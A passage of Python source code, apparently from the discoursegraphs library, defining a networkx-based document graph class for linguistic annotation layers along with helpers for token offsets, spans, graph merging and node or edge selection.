class EdgeTypes(object):
"""Enumerator of edge types"""
pointing_relation = 'points_to'
# reverse_pointing_relation = 'is_pointed_to_by' # not needed right now
dominance_relation = 'dominates'
reverse_dominance_relation = 'is_dominated_by'
spanning_relation = 'spans'
# reverse_spanning_relation = 'is_part_of' # not needed right now
precedence_relation = 'precedes'
class DiscourseDocumentGraph(MultiDiGraph):
"""
Base class for representing annotated documents as directed graphs
with multiple edges.
Attributes
----------
ns : str
the namespace of the graph (default: discoursegraph)
root : str
name of the document root node ID
(default: self.ns+':root_node')
sentences : list of str
sorted list of all sentence root node IDs (of sentences
contained in this document graph -- iff the document was annotated
for sentence boundaries in one of the layers present in this graph)
tokens : list of int
a list of node IDs (int) which represent the tokens in the
order they occur in the text
TODO list:
- allow layers to be a single str or set of str
- allow adding a layer by including it in ``**attr``
- add consistency check that would allow adding a node that
already exists in the graph, but only if the new graph has
different attributes (layers can be the same though)
- outsource layer assertions to method?
"""
# Create a multdigraph object that tracks the order nodes are added
# and for each node track the order that neighbors are added and for
# each neighbor tracks the order that multiedges are added.
# Cf. nx.MultiDiGraph docstring (OrderedGraph)
node_dict_factory = OrderedDict
adjlist_dict_factory = OrderedDict
edge_key_dict_factory = OrderedDict
def __init__(self, name='', namespace='discoursegraph', root=None):
"""
Initialized an empty directed graph which allows multiple edges.
Parameters
----------
name : str or None
name or ID of the graph to be generated.
namespace : str
namespace of the graph (default: discoursegraph)
root : str or None
Name of the root node. If None, defaults to namespace+':root_node'.
"""
# super calls __init__() of base class MultiDiGraph
super(DiscourseDocumentGraph, self).__init__()
self.name = name
self.ns = namespace
self.root = root if root else self.ns+':root_node'
self.add_node(self.root, layers={self.ns})
# metadata shall be stored in the root node's dictionary
self.node[self.root]['metadata'] = defaultdict(lambda: defaultdict(dict))
self.sentences = []
self.tokens = []
def add_offsets(self, offset_ns=None):
"""
adds the onset and offset to each token in the document graph, i.e.
the character position where each token starts and ends.
"""
if offset_ns is None:
offset_ns = self.ns
onset = 0
offset = 0
for token_id, token_str in self.get_tokens():
offset = onset + len(token_str)
self.node[token_id]['{0}:{1}'.format(offset_ns, 'onset')] = onset
self.node[token_id]['{0}:{1}'.format(offset_ns, 'offset')] = offset
onset = offset + 1
def get_offsets(self, token_node_id=None, offset_ns=None):
"""
returns the offsets (character starting and end position) of a token
or of all tokens occurring in the document.
Parameters
----------
token_node_id : str, int or None
Node ID of a token from which we want to retrieve the start and end
position. If no node ID is given, this method will yield
(token node ID, start pos, end pos) tuples containing data for all
tokens in the document
offset_ns : str or None
The namespace from which the offsets will be retrieved. If no
namespace is given, the default namespace of this document graph is
chosen
Returns
-------
offsets : tuple(int, int) or generator(tuple(str, int, int))
If a token node ID is given, a (character onset int, character
offset int) tuple is returned. Otherwise, a generator of (token
node ID str, character onset int, character offset int) tuples
will be returned, representing all the tokens in the order they
occur in the document.
"""
if offset_ns is None:
offset_ns = self.ns
try:
if token_node_id is not None:
assert istoken(self, token_node_id), \
"'{}' is not a token node.".format(token_node_id)
onset = self.node[token_node_id]['{0}:{1}'.format(offset_ns, 'onset')]
offset = self.node[token_node_id]['{0}:{1}'.format(offset_ns, 'offset')]
return (onset, offset)
else: # return offsets for all tokens in the document
return self._get_all_offsets(offset_ns)
# if the document doesn't have offsets: add them and rerun this method
except KeyError as e:
self.add_offsets(offset_ns)
return self.get_offsets(token_node_id, offset_ns)
def _get_all_offsets(self, offset_ns=None):
"""
returns all token offsets of this document as a generator of
(token node ID str, character onset int, character offset int) tuples.
Parameters
----------
offset_ns : str or None
The namespace from which the offsets will be retrieved. If no
namespace is given, the default namespace of this document graph is
chosen
Returns
-------
offsets : generator(tuple(str, int, int))
a generator of (token node ID str, character onset int, character
offset int) tuples, which represents all the tokens in the order
they occur in the document.
"""
for token_id, _token_str in self.get_tokens():
onset = self.node[token_id]['{0}:{1}'.format(offset_ns, 'onset')]
offset = self.node[token_id]['{0}:{1}'.format(offset_ns, 'offset')]
yield (token_id, onset, offset)
def get_phrases(self, ns=None, layer='syntax', cat_key='cat', cat_val='NP'):
"""yield all node IDs that dominate the given phrase type, e.g. all NPs"""
if not ns:
ns = self.ns
for node_id in select_nodes_by_layer(self, '{0}:{1}'.format(ns, layer)):
if self.node[node_id][self.ns+':'+cat_key] == cat_val:
yield node_id
def add_node(self, n, layers=None, attr_dict=None, **attr):
"""Add a single node n and update node attributes.
Parameters
----------
n : node
A node can be any hashable Python object except None.
layers : set of str or None
the set of layers the node belongs to,
e.g. {'tiger:token', 'anaphoricity:annotation'}.
Will be set to {self.ns} if None.
attr_dict : dictionary, optional (default= no attributes)
Dictionary of node attributes. Key/value pairs will
update existing data associated with the node.
attr : keyword arguments, optional
Set or change attributes using key=value.
See Also
--------
add_nodes_from
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_node(1, {'node'})
# adding the same node with a different layer
>>> d.add_node(1, {'number'})
>>> d.nodes(data=True)
[(1, {'layers': {'node', 'number'}})]
Use keywords set/change node attributes:
>>> d.add_node(1, {'node'}, size=10)
>>> d.add_node(3, layers={'num'}, weight=0.4, UTM=('13S',382))
>>> d.nodes(data=True)
[(1, {'layers': {'node', 'number'}, 'size': 10}),
(3, {'UTM': ('13S', 382), 'layers': {'num'}, 'weight': 0.4})]
Notes
-----
A hashable object is one that can be used as a key in a Python
dictionary. This includes strings, numbers, tuples of strings
and numbers, etc.
On many platforms hashable items also include mutables such as
NetworkX Graphs, though one should be careful that the hash
doesn't change on mutables.
"""
if not layers:
layers = {self.ns}
assert isinstance(layers, set), \
"'layers' parameter must be given as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
# add layers to keyword arguments dict
attr.update({'layers': layers})
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
assert isinstance(attr_dict, dict), \
"attr_dict must be a dictionary, not a '{}'".format(type(attr_dict))
attr_dict.update(attr)
# if there's no node with this ID in the graph, yet
if n not in self.succ:
self.succ[n] = {}
self.pred[n] = {}
self.node[n] = attr_dict
else: # update attr even if node already exists
# if a node exists, its attributes will be updated, except
# for the layers attribute. the value of 'layers' will
# be the union of the existing layers set and the new one.
existing_layers = self.node[n]['layers']
all_layers = existing_layers.union(layers)
attrs_without_layers = {k: v for (k, v) in attr_dict.items()
if k != 'layers'}
self.node[n].update(attrs_without_layers)
self.node[n].update({'layers': all_layers})
def add_nodes_from(self, nodes, **attr):
"""Add multiple nodes.
Parameters
----------
nodes : iterable container
A container of nodes (list, dict, set, etc.).
OR
A container of (node, attribute dict) tuples.
Node attributes are updated using the attribute dict.
attr : keyword arguments, optional (default= no attributes)
Update attributes for all nodes in nodes.
Node attributes specified in nodes as a tuple
take precedence over attributes specified generally.
See Also
--------
add_node
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_nodes_from([(1, {'layers':{'token'}, 'word':'hello'}), \
(2, {'layers':{'token'}, 'word':'world'})])
>>> d.nodes(data=True)
[(1, {'layers': {'token'}, 'word': 'hello'}),
(2, {'layers': {'token'}, 'word': 'world'})]
Use keywords to update specific node attributes for every node.
>>> d.add_nodes_from(d.nodes(data=True), weight=1.0)
>>> d.nodes(data=True)
[(1, {'layers': {'token'}, 'weight': 1.0, 'word': 'hello'}),
(2, {'layers': {'token'}, 'weight': 1.0, 'word': 'world'})]
Use (node, attrdict) tuples to update attributes for specific
nodes.
>>> d.add_nodes_from([(1, {'layers': {'tiger'}})], size=10)
>>> d.nodes(data=True)
[(1, {'layers': {'tiger', 'token'}, 'size': 10, 'weight': 1.0,
'word': 'hello'}),
(2, {'layers': {'token'}, 'weight': 1.0, 'word': 'world'})]
"""
additional_attribs = attr # will be added to each node
for n in nodes:
try: # check, if n is a node_id or a (node_id, attrib dict) tuple
newnode = n not in self.succ # is node in the graph, yet?
except TypeError: # n is a (node_id, attribute dict) tuple
node_id, ndict = n
if not 'layers' in ndict:
ndict['layers'] = {self.ns}
layers = ndict['layers']
assert isinstance(layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
if node_id not in self.succ: # node doesn't exist, yet
self.succ[node_id] = {}
self.pred[node_id] = {}
newdict = additional_attribs.copy()
newdict.update(ndict) # all given attribs incl. layers
self.node[node_id] = newdict
else: # node already exists
existing_layers = self.node[node_id]['layers']
all_layers = existing_layers.union(layers)
self.node[node_id].update(ndict)
self.node[node_id].update(additional_attribs)
self.node[node_id].update({'layers': all_layers})
continue # process next node
# newnode check didn't raise an exception
if newnode: # n is a node_id and it's not in the graph, yet
self.succ[n] = {}
self.pred[n] = {}
self.node[n] = attr.copy()
# since the node isn't represented as a
# (node_id, attribute dict) tuple, we don't know which layers
# it is part of. Therefore, we'll add the namespace of the
# graph as the node layer
self.node[n].update({'layers': set([self.ns])})
else: # n is a node_id and it's already in the graph
self.node[n].update(attr)
def add_edge(self, u, v, layers=None, key=None, attr_dict=None, **attr):
"""Add an edge between u and v.
An edge can only be added if the nodes u and v already exist.
This decision was taken to ensure that all nodes are associated
with at least one (meaningful) layer.
Edge attributes can be specified with keywords or by providing
a dictionary with key/value pairs. In contrast to other
edge attributes, layers can only be added not overwriten or
deleted.
Parameters
----------
u,v : nodes
Nodes can be, for example, strings or numbers.
Nodes must be hashable (and not None) Python objects.
layers : set of str
the set of layers the edge belongs to,
e.g. {'tiger:token', 'anaphoricity:annotation'}.
Will be set to {self.ns} if None.
key : hashable identifier, optional (default=lowest unused integer)
Used to distinguish multiedges between a pair of nodes.
attr_dict : dictionary, optional (default= no attributes)
Dictionary of edge attributes. Key/value pairs will
update existing data associated with the edge.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
See Also
--------
add_edges_from : add a collection of edges
Notes
-----
To replace/update edge data, use the optional key argument
to identify a unique edge. Otherwise a new edge will be created.
NetworkX algorithms designed for weighted graphs cannot use
multigraphs directly because it is not clear how to handle
multiedge weights. Convert to Graph using edge attribute
'weight' to enable weighted graph algorithms.
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_nodes_from([(1, {'layers':{'token'}, 'word':'hello'}), \
(2, {'layers':{'token'}, 'word':'world'})])
>>> d.edges(data=True)
>>> []
>>> d.add_edge(1, 2, layers={'generic'})
>>> d.add_edge(1, 2, layers={'tokens'}, weight=0.7)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'tokens'}, 'weight': 0.7})]
>>> d.edge[1][2]
{0: {'layers': {'generic'}}, 1: {'layers': {'tokens'}, 'weight': 0.7}}
>>> d.add_edge(1, 2, layers={'tokens'}, key=1, weight=1.0)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'tokens'}, 'weight': 1.0})]
>>> d.add_edge(1, 2, layers={'foo'}, key=1, weight=1.0)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'foo', 'tokens'}, 'weight': 1.0})]
"""
if not layers:
layers = {self.ns}
assert isinstance(layers, set), \
"'layers' parameter must be given as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
# add layers to keyword arguments dict
attr.update({'layers': layers})
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
try:
attr_dict.update(attr)
except AttributeError as e:
raise AttributeError("The attr_dict argument must be "
"a dictionary: ".format(e))
for node in (u, v): # u = source, v = target
if node not in self.nodes_iter():
self.add_node(node, layers={self.ns})
if v in self.succ[u]: # if there's already an edge from u to v
keydict = self.adj[u][v]
if key is None: # creating additional edge
# find a unique integer key
# other methods might be better here?
key = len(keydict)
while key in keydict:
key += 1
datadict = keydict.get(key, {}) # works for existing & new edge
existing_layers = datadict.get('layers', set())
all_layers = existing_layers.union(layers)
datadict.update(attr_dict)
datadict.update({'layers': all_layers})
keydict[key] = datadict
else: # there's no edge between u and v, yet
# selfloops work this way without special treatment
if key is None:
key = 0
datadict = {}
datadict.update(attr_dict) # includes layers
keydict = {key: datadict}
self.succ[u][v] = keydict
self.pred[v][u] = keydict
def add_edges_from(self, ebunch, attr_dict=None, **attr):
"""Add all the edges in ebunch.
Parameters
----------
ebunch : container of edges
Each edge given in the container will be added to the
graph. The edges can be:
- 3-tuples (u,v,d) for an edge attribute dict d, or
- 4-tuples (u,v,k,d) for an edge identified by key k
Each edge must have a layers attribute (set of str).
attr_dict : dictionary, optional (default= no attributes)
Dictionary of edge attributes. Key/value pairs will
update existing data associated with each edge.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
See Also
--------
add_edge : add a single edge
Notes
-----
Adding the same edge twice has no effect but any edge data
will be updated when each duplicate edge is added.
An edge can only be added if the source and target nodes are
already present in the graph. This decision was taken to ensure
that all edges are associated with at least one (meaningful)
layer.
Edge attributes specified in edges as a tuple (in ebunch) take
precedence over attributes specified otherwise (in attr_dict or
attr). Layers can only be added (via a 'layers' edge attribute),
but not overwritten.
Examples
--------
>>> d = DiscourseDocumentGraph()
>>> d.add_node(1, {'int'})
>>> d.add_node(2, {'int'})
>>> d.add_edges_from([(1, 2, {'layers': {'int'}, 'weight': 23})])
>>> d.add_edges_from([(1, 2, {'layers': {'int'}, 'weight': 42})])
>>> d.edges(data=True) # multiple edges between the same nodes
[(1, 2, {'layers': {'int'}, 'weight': 23}),
(1, 2, {'layers': {'int'}, 'weight': 42})]
Associate data to edges
We update the existing edge (key=0) and overwrite its 'weight'
value. Note that we can't overwrite the 'layers' value, though.
Instead, they are added to the set of existing layers
>>> d.add_edges_from([(1, 2, 0, {'layers':{'number'}, 'weight':66})])
[(1, 2, {'layers': {'int', 'number'}, 'weight': 66}),
(1, 2, {'layers': {'int'}, 'weight': 42})]
"""
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
try:
attr_dict.update(attr)
except AttributeError as e:
raise AttributeError("The attr_dict argument must be "
"a dictionary: ".format(e))
# process ebunch
for e in ebunch:
ne = len(e)
if ne == 4:
u, v, key, dd = e
elif ne == 3:
u, v, dd = e
key = None
else:
raise AttributeError(
"Edge tuple {0} must be a 3-tuple (u,v,attribs) "
"or 4-tuple (u,v,key,attribs).".format(e))
if not 'layers' in dd:
dd['layers'] = {self.ns}
layers = dd['layers']
assert isinstance(layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str)
for layer in layers)), \
"All elements of the 'layers' set must be strings."
additional_layers = attr_dict.get('layers', {})
if additional_layers:
assert isinstance(additional_layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str)
for layer in additional_layers)), \
"'layers' set must only contain strings."
# union of layers specified in ebunch tuples,
# attr_dict and **attr
new_layers = layers.union(additional_layers)
if u in self.adj: # edge with u as source already exists
keydict = self.adj[u].get(v, {})
else:
keydict = {}
if key is None:
# find a unique integer key
# other methods might be better here?
key = len(keydict)
while key in keydict:
key += 1
datadict = keydict.get(key, {}) # existing edge attribs
existing_layers = datadict.get('layers', set())
datadict.update(attr_dict)
datadict.update(dd)
updated_attrs = {k: v for (k, v) in datadict.items()
if k != 'layers'}
all_layers = existing_layers.union(new_layers)
# add_edge() checks if u and v exist, so we don't need to
self.add_edge(u, v, layers=all_layers, key=key,
attr_dict=updated_attrs)
def add_layer(self, element, layer):
"""
add a layer to an existing node or edge
Parameters
----------
element : str, int, (str/int, str/int)
the ID of a node or edge (source node ID, target node ID)
layer : str
the layer that the element shall be added to
"""
assert isinstance(layer, str), "Layers must be strings!"
if isinstance(element, tuple): # edge repr. by (source, target)
assert len(element) == 2
assert all(isinstance(node, (str, int)) for node in element)
source_id, target_id = element
# this class is based on a multi-digraph, so we'll have to iterate
# over all edges between the two nodes (even if there's just one)
edges = self.edge[source_id][target_id]
for edge in edges:
existing_layers = edges[edge]['layers']
existing_layers.add(layer)
edges[edge]['layers'] = existing_layers
if isinstance(element, (str, int)): # node
existing_layers = self.node[element]['layers']
existing_layers.add(layer)
self.node[element]['layers'] = existing_layers
def get_token(self, token_node_id, token_attrib='token'):
"""
given a token node ID, returns the token unicode string.
Parameters
----------
token_node_id : str
the ID of the token node
token_attrib : str
name of the node attribute that contains the token string as its
value (default: token).
Returns
-------
token : unicode
the token string
"""
return self.node[token_node_id][self.ns+':'+token_attrib]
def get_tokens(self, token_attrib='token', token_strings_only=False):
"""
returns a list of (token node ID, token) which represent the tokens
of the input document (in the order they occur).
Parameters
----------
token_attrib : str
name of the node attribute that contains the token string as its
value (default: token).
Yields
-------
result : generator of (str, unicode) or generator unicode
a generator of (token node ID, token string) tuples if
token_strings_only==False, a generator of token strings otherwise
"""
if token_strings_only:
for token_id in self.tokens:
yield self.get_token(token_id, token_attrib)
else:
for token_id in self.tokens:
yield (token_id, self.get_token(token_id, token_attrib))
def merge_graphs(self, other_docgraph, verbose=False):
"""
Merges another document graph into the current one, thereby adding all
the necessary nodes and edges (with attributes, layers etc.).
NOTE: This will only work if both graphs have exactly the same
tokenization.
"""
# keep track of all merged/old root nodes in case we need to
# delete them or their attributes (e.g. 'metadata')
if hasattr(self, 'merged_rootnodes'):
self.merged_rootnodes.append(other_docgraph.root)
else:
self.merged_rootnodes = [other_docgraph.root]
# renaming the tokens of the other graph to match this one
rename_tokens(other_docgraph, self, verbose=verbose)
self.add_nodes_from(other_docgraph.nodes(data=True))
# copy token node attributes to the current namespace
for node_id, node_attrs in other_docgraph.nodes(data=True):
if istoken(other_docgraph, node_id) and \
self.ns+':token' not in self.node[node_id]:
self.node[node_id].update({self.ns+':token': other_docgraph.get_token(node_id)})
self.add_edges_from(other_docgraph.edges(data=True))
# workaround for issues #89 and #96
# copy the token node IDs / sentence node IDs from the other graph,
# if this graph doesn't have such lists, yet
if other_docgraph.name and not self.name:
self.name = other_docgraph.name
if other_docgraph.tokens and not self.tokens:
self.tokens = other_docgraph.tokens
if other_docgraph.sentences and not self.sentences:
self.sentences = other_docgraph.sentences
# there should be no dangling, unused root nodes in a merged graph
self.merge_rootnodes(other_docgraph)
def merge_rootnodes(self, other_docgraph):
"""
Copy all the metadata from the root node of the other graph into this
one. Then, move all edges belonging to the other root node to this
one. Finally, remove the root node of the other graph from this one.
"""
# copy metadata from other graph, cf. #136
if 'metadata' in other_docgraph.node[other_docgraph.root]:
other_meta = other_docgraph.node[other_docgraph.root]['metadata']
self.node[self.root]['metadata'].update(other_meta)
assert not other_docgraph.in_edges(other_docgraph.root), \
"root node in graph '{}' must not have any ingoing edges".format(
other_docgraph.name)
for (root, target, attrs) in other_docgraph.out_edges(
other_docgraph.root, data=True):
self.add_edge(self.root, target, attr_dict=attrs)
self.remove_node(other_docgraph.root)
def add_precedence_relations(self):
"""
add precedence relations to the document graph (i.e. an edge from the
root node to the first token node, an edge from the first token node to
the second one etc.)
"""
assert len(self.tokens) > 1, \
"There are no tokens to add precedence relations to."
self.add_edge(self.root, self.tokens[0],
layers={self.ns, self.ns+':precedence'},
edge_type=EdgeTypes.precedence_relation)
for i, token_node_id in enumerate(self.tokens[1:]):
# edge from token_n to token_n+1
self.add_edge(self.tokens[i], token_node_id,
layers={self.ns, self.ns+':precedence'},
edge_type=EdgeTypes.precedence_relation)
def rename_tokens(docgraph_with_old_names, docgraph_with_new_names, verbose=False):
"""
Renames the tokens of a graph (``docgraph_with_old_names``) in-place,
using the token names of another document graph
(``docgraph_with_new_names``). Also updates the ``.tokens`` list of the old
graph.
This will only work, iff both graphs have the same tokenization.
"""
old2new = create_token_mapping(docgraph_with_old_names,
docgraph_with_new_names, verbose=verbose)
# save the mappings from old to new token node IDs in the `renamed_nodes`
# attribute of the merged graph
if hasattr(docgraph_with_new_names, 'renamed_nodes'):
docgraph_with_new_names.renamed_nodes.update(old2new)
else:
docgraph_with_new_names.renamed_nodes = old2new
relabel_nodes(docgraph_with_old_names, old2new, copy=False)
new_token_ids = old2new.values()
# new_token_ids could be empty (if docgraph_with_new_names is still empty)
if new_token_ids:
docgraph_with_old_names.tokens = new_token_ids
def create_token_mapping(docgraph_with_old_names, docgraph_with_new_names,
verbose=False):
"""
given two document graphs which annotate the same text and which use the
same tokenization, creates a dictionary with a mapping from the token
IDs used in the first graph to the token IDs used in the second graph.
Parameters
----------
docgraph_with_old_names : DiscourseDocumentGraph
a document graph with token IDs that will be replaced later on
docgraph_with_new_names : DiscourseDocumentGraph
a document graph with token IDs that will replace the token IDs
used in ``docgraph_with_old_names`` later on
Returns
-------
old2new : dict
maps from a token ID used in ``docgraph_with_old_names`` to the token
ID used in ``docgraph_with_new_names`` to reference the same token
"""
def kwic_string(docgraph, keyword_index):
tokens = [tok for (tokid, tok) in list(docgraph.get_tokens())]
before, keyword, after = get_kwic(tokens, keyword_index)
return "{0} (Index: {1}): {2} [[{3}]] {4}\n".format(
docgraph.name, keyword_index, ' '.join(before), keyword,
' '.join(after))
# generators of (token ID, token) tuples
old_token_gen = docgraph_with_old_names.get_tokens()
new_token_gen = docgraph_with_new_names.get_tokens()
old2new = {}
for i, (new_tok_id, new_tok) in enumerate(new_token_gen):
old_tok_id, old_tok = old_token_gen.next()
if new_tok != old_tok: # token mismatch
if verbose:
raise ValueError(u"Tokenization mismatch:\n{0}{1}".format(
kwic_string(docgraph_with_old_names, i),
kwic_string(docgraph_with_new_names, i)))
raise ValueError(
u"Tokenization mismatch: {0} ({1}) vs. {2} ({3})\n"
"\t{4} != {5}".format(
docgraph_with_new_names.name, docgraph_with_new_names.ns,
docgraph_with_old_names.name, docgraph_with_old_names.ns,
new_tok, old_tok).encode('utf-8'))
else:
old2new[old_tok_id] = new_tok_id
return old2new
def get_kwic(tokens, index, context_window=5):
"""
keyword in context
Parameters
----------
tokens : list of str
a text represented as a list of tokens
index : int
the index of the keyword in the token list
context_window : int
the number of preceding/succeding words of the keyword to be
retrieved
Returns
-------
before : list of str
the tokens preceding the keyword
keyword : str
the token at the index position
after : list of str
the tokens succeding the keyword
"""
text_length = len(tokens)
start_before = max(0, index-context_window)
end_before = max(0, index)
before = tokens[start_before:end_before]
start_after = min(text_length, index+1)
end_after = min(text_length, index+context_window+1)
after = tokens[start_after:end_after]
return before, tokens[index], after
def get_annotation_layers(docgraph):
"""
WARNING: this is higly inefficient!
Fix this via Issue #36.
Returns
-------
all_layers : set or dict
the set of all annotation layers used in the given graph
"""
node_layers = get_node_annotation_layers(docgraph)
return node_layers.union(get_edge_annotation_layers(docgraph))
def get_top_level_layers(docgraph):
"""
WARNING: this is higly inefficient!
Fix this via Issue #36.
Returns
-------
top_level_layers : set
the set of all top level annotation layers used in the given graph
(e.g. 'tiger' or 'rst', but not 'tiger:sentence:root' or 'rst:segment')
"""
return set(layer.split(':')[0]
for layer in get_annotation_layers(docgraph))
def get_node_annotation_layers(docgraph):
"""
WARNING: this is higly inefficient!
Fix this via Issue #36.
Returns
-------
all_layers : set or dict
the set of all annotation layers used for annotating nodes in the given
graph
"""
all_layers = set()
for node_id, node_attribs in docgraph.nodes_iter(data=True):
for layer in node_attribs['layers']:
all_layers.add(layer)
return all_layers
def get_edge_annotation_layers(docgraph):
"""
WARNING: this is higly inefficient!
Fix this via Issue #36.
Returns
-------
all_layers : set or dict
the set of all annotation layers used for annotating edges in the given
graph
"""
all_layers = set()
for source_id, target_id, edge_attribs in docgraph.edges_iter(data=True):
for layer in edge_attribs['layers']:
all_layers.add(layer)
return all_layers
def get_span_offsets(docgraph, node_id):
"""
returns the character start and end position of the span of text that
the given node spans or dominates.
Returns
-------
offsets : tuple(int, int)
character onset and offset of the span
"""
try:
span = get_span(docgraph, node_id)
# workaround for issue #138
# TODO: when #138 is fixed, just take the first onset / last offset
onsets, offsets = zip(*[docgraph.get_offsets(tok_node)
for tok_node in span])
return (min(onsets), max(offsets))
except KeyError as _:
raise KeyError("Node '{}' doesn't span any tokens.".format(node_id))
def get_span(docgraph, node_id, debug=False):
"""
returns all the tokens that are dominated or in a span relation with
the given node. If debug is set to True, you'll get a warning if the
graph is cyclic.
Returns
-------
span : list of str
sorted list of token nodes (token node IDs)
"""
if debug is True and is_directed_acyclic_graph(docgraph) is False:
warnings.warn(
("Can't reliably extract span '{0}' from cyclical graph'{1}'."
"Maximum recursion depth may be exceeded.").format(node_id,
docgraph))
span = []
if docgraph.ns+':token' in docgraph.node[node_id]:
span.append(node_id)
for src_id, target_id, edge_attribs in docgraph.out_edges_iter(node_id,
data=True):
if src_id == target_id:
continue # ignore self-loops
# ignore pointing relations
if edge_attribs['edge_type'] != EdgeTypes.pointing_relation:
span.extend(get_span(docgraph, target_id))
return sorted(span, key=natural_sort_key)
def get_text(docgraph, node_id=None):
"""
returns the text (joined token strings) that the given node dominates
or spans. If no node ID is given, returns the complete text of the
document
"""
if node_id:
tokens = (docgraph.node[node_id][docgraph.ns+':token']
for node_id in get_span(docgraph, node_id))
else:
tokens = (docgraph.node[token_id][docgraph.ns+':token']
for token_id in docgraph.tokens)
return ' '.join(tokens)
def tokens2text(docgraph, token_ids):
"""
given a list of token node IDs, returns a their string representation
(concatenated token strings).
"""
return ' '.join(docgraph.node[token_id][docgraph.ns+':token']
for token_id in token_ids)
def istoken(docgraph, node_id, namespace=None):
"""returns true, iff the given node ID belongs to a token node.
Parameters
----------
node_id : str
the node to be checked
namespace : str or None
If a namespace is given, only look for tokens in the given namespace.
Otherwise, look for tokens in the default namespace of the given
document graph.
"""
if namespace is None:
namespace = docgraph.ns
return namespace+':token' in docgraph.node[node_id]
def is_continuous(docgraph, dominating_node):
"""return True, if the tokens dominated by the given node are all adjacent"""
first_onset, last_offset = get_span_offsets(docgraph, dominating_node)
span_range = xrange(first_onset, last_offset+1)
token_offsets = (docgraph.get_offsets(tok)
for tok in get_span(docgraph, dominating_node))
char_positions = set(itertools.chain.from_iterable(xrange(on, off+1)
for on, off in token_offsets))
for item in span_range:
if item not in char_positions:
return False
return True
def select_neighbors_by_layer(docgraph, node, layer, data=False):
"""
Get all neighboring nodes belonging to (any of) the given layer(s),
A neighboring node is a node that the given node connects to with an
outgoing edge.
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
layer : str or collection of str
name(s) of the layer(s)
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
If data is False (default), a generator of neighbor node IDs
that are present in the given layer. If data is True,
a generator of (node ID, node attrib dict) tuples.
"""
for node_id in docgraph.neighbors_iter(node):
node_layers = docgraph.node[node_id]['layers']
if isinstance(layer, (str, unicode)):
condition = layer in node_layers
else: # ``layer`` is a list/set/dict of layers
condition = any(l in node_layers for l in layer)
if condition:
yield (node_id, docgraph.node[node_id]) if data else (node_id)
def select_neighbors_by_edge_attribute(docgraph, source,
attribute=None, value=None, data=False):
"""Get all neighbors with the given edge attribute value(s)."""
assert isinstance(docgraph, MultiGraph)
for neighbor_id in docgraph.neighbors_iter(source):
edges = docgraph[source][neighbor_id].values()
if attribute is None:
has_attrib = True # don't filter neighbors
else:
has_attrib = any(attribute in edge for edge in edges)
if has_attrib:
if value is None:
has_value = True
elif isinstance(value, basestring):
has_value = any(edge.get(attribute) == value
for edge in edges)
else: # ``value`` is a list/set/dict of values
has_value = any(edge.get(attribute) == v
for edge in edges
for v in value)
if has_value:
if data:
yield (neighbor_id, docgraph.node[neighbor_id])
else:
yield neighbor_id
def select_nodes_by_layer(docgraph, layer=None, data=False):
"""
Get all nodes belonging to (any of) the given layer(s).
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
layer : str or collection of str or None
name(s) of the layer(s) to select nodes from. If None, returns all
nodes
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
If data is False (default), a generator of node IDs that are present in
the given layer. If data is True, a generator of (node ID, node attrib
dict) tuples.
"""
for node_id, node_attribs in docgraph.nodes_iter(data=True):
if layer is None:
condition = True # don't filter nodes
elif isinstance(layer, (str, unicode)):
condition = layer in node_attribs['layers']
else: # ``layer`` is a list/set/dict of layers
condition = any(l in node_attribs['layers'] for l in layer)
if condition:
if data:
yield (node_id, node_attribs)
else:
yield node_id
def select_nodes_by_attribute(docgraph, attribute=None, value=None, data=False):
"""
Get all nodes with the given attribute (and attribute value).
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
attribute : str or None
Name of the node attribute that all nodes must posess.
If None, returns all nodes.
value : str or collection of str or None
Value of the node attribute that all nodes must posess.
If None, returns all nodes with the given node attribute key .
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
If data is False (default), a generator of node (IDs) that posess
the given attribute. If data is True, a generator of (node ID,
node attrib dict) tuples.
"""
for node_id, node_attribs in docgraph.nodes_iter(data=True):
if attribute is None:
has_attrib = True # don't filter nodes
else:
has_attrib = attribute in node_attribs
if has_attrib:
if value is None:
has_value = True
elif isinstance(value, basestring):
has_value = node_attribs.get(attribute) == value
else: # ``value`` is a list/set/dict of values
has_value = any(node_attribs.get(attribute) == v for v in value)
if has_value:
if data:
yield (node_id, node_attribs)
else:
yield node_id
def select_edges(docgraph, conditions, data):
"""yields all edges that meet the conditions given as eval strings"""
for (src_id, target_id, edge_attribs) in docgraph.edges(data=True):
# if all conditions are fulfilled
# we need to add edge_attribs to the namespace eval is working in
if all((eval(cond, {'edge_attribs': edge_attribs})
for cond in conditions)):
if data:
yield (src_id, target_id, edge_attribs)
else:
yield (src_id, target_id)
def select_edges_by_attribute(docgraph, attribute=None, value=None, data=False):
"""
get all edges with the given edge type and layer.
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
attribute : str or None
Name of the node attribute that all nodes must posess.
If None, returns all nodes.
value : str or collection of str or None
